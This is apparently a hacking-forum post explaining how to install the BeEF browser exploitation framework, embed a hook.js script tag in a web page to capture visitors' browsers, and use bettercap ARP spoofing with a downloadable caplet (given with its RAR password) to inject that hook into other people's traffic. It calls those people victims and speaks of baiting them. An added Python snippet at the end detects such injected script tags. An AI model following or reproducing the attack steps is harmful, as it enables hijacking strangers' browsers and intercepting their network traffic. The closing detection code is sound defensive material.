What is BeEF?
In this topic, we will examine a tool called BeEF. The name stands for Browser Exploitation Framework, and it is a tool for exploiting browsers.
Hackers use this tool to run JavaScript code in the target computer's browser.
BeEF consists of 3 layers.
1- The personal computers of the attacker or attackers
2- The server where BeEF is installed
3- Targets
How to Install BeEF on Kali Linux?
We open the terminal and type the following.
Code:
git clone https://github.com/beefproject/beef
After the clone finishes, we type ls in the terminal and see the beef folder.
We type cd beef to go into the beef folder.
We run ./install, one time only, answer "y" to the questions and press Enter.
From now on, after the system has been turned off and on again, it is enough to type "cd beef" and then "./beef".
The error shown here asks us to change the username and password in BeEF.
For this, we type nano config.yaml in the terminal.
After the user and passwd values are changed, we press CTRL-O, Enter and then CTRL-X to save and exit.
To log in to BeEF, type ./beef and then click one of the addresses below.
Friends, I will demonstrate on an Apache server so that you can understand the basics of BeEF.
First of all, I will create a website using the Apache service in Linux.
This is for example purposes only; you can think more creatively to get your victims on the hook.
For this, I go to the console and type service apache2 start.
Then I edit my site's index page, the file /var/www/index.html.
We open index.html with leafpad or another application and paste the code <script src="http://127.0.0.1:3000/hook.js"></script> into it. You need to write your own IP address instead of 127.0.0.1.
To learn our own IP, we go to the terminal and type ifconfig. Mine is 10.0.2.10, so I write the code like this: <script src="http://10.0.2.10:3000/hook.js"></script>
Yes, our target has taken the bait. For us to keep reaching our target for a long time, the victim has to stay on the site.
We will inject JavaScript code into our victim's browser so that we can still access it even if the victim leaves our site.
For this, we will use bettercap, which is available in Kali Linux.
First you need to download the file named beefcustom.zip that I have given at the bottom of the topic.
We copy the folder named beefcustom from the downloaded RAR file into the /usr/share/bettercap/caplets directory.
Open the file named beefcustom.cap in the beefcustom folder with leafpad or another application.
Where it says set arp.spoof.targets 10.0.2.4, we write the IPs of our victim in place of that IP.
Then we open the file named beefcustom.js in the same way, write our own IP address instead of 10.0.2.8, then save and close.
To run bettercap, we type bettercap -iface eth0 -caplet /usr/share/bettercap/caplets/beefcustom/beefcustom.cap in the terminal.
Yes, the victim is now online. Let's try our commands in the victim's browser; for this, we click on the Commands section shown in the photo below.
The green ones mean they will work; the red ones mean they are less likely to work.
I click on the Browser section under Commands. In Hooked Domain there is a command called Create Alert Dialog; let's try it, as it will send a warning message to our victim.
Yes, we have a warning message.
BEEF CUSTOM DOWNLOAD LINK: https://www.dosyaupload.com/cgZ8
RAR PASS: pytang
VIRUS TOTAL: https://www.virustotal.com/gui/file...23f57240b2e6273c6b5ed04edb1168a8056/detection
Source: https://www.turkhackteam.org/siber-...sil-kullanilir-browserlari-somurme-araci.html
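A defender's check for the script tag shown in the post, as an added example that is not part of the original post: it lists every external script on a page that is not on an allowlist and notes why each one stands out. The function names, sample page and allowlist are constructed for illustration; the 10.0.2.10 address and the hook.js path are the ones used in the post.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urljoin, urlsplit

# Constructed sample page: one same-site script, one CDN script, one injected tag.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
<script src="http://10.0.2.10:3000/hook.js"></script>
</head><body>Welcome</body></html>"""

class ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> tag."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        if tag == "script" and src:
            self.sources.append(src.strip())

def is_ip_literal(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def audit_scripts(html, page_url, allowed_hosts=()):
    """Return (src, reasons) for each script whose host is neither the page's own nor allowed."""
    collector = ScriptCollector()
    collector.feed(html)
    page_host = urlsplit(page_url).hostname
    findings = []
    for src in collector.sources:
        url = urlsplit(urljoin(page_url, src))  # resolve relative paths first
        host = url.hostname or ""
        if host == page_host or host in allowed_hosts:
            continue
        reasons = ["host not on allowlist"]
        if url.scheme == "http":
            reasons.append("loaded over plain HTTP")
        if is_ip_literal(host):
            reasons.append("IP-literal host")
        if url.path.rsplit("/", 1)[-1] == "hook.js":
            reasons.append("hook.js filename")
        findings.append((src, reasons))
    return findings

if __name__ == "__main__":
    for src, why in audit_scripts(SAMPLE_PAGE, "http://www.example.com/index.html", {"cdn.example.com"}):
        print(src, "->", ", ".join(why))
```

Checking the page as fetched over the network, not only the file on disk, also covers scripts added in transit over plain HTTP.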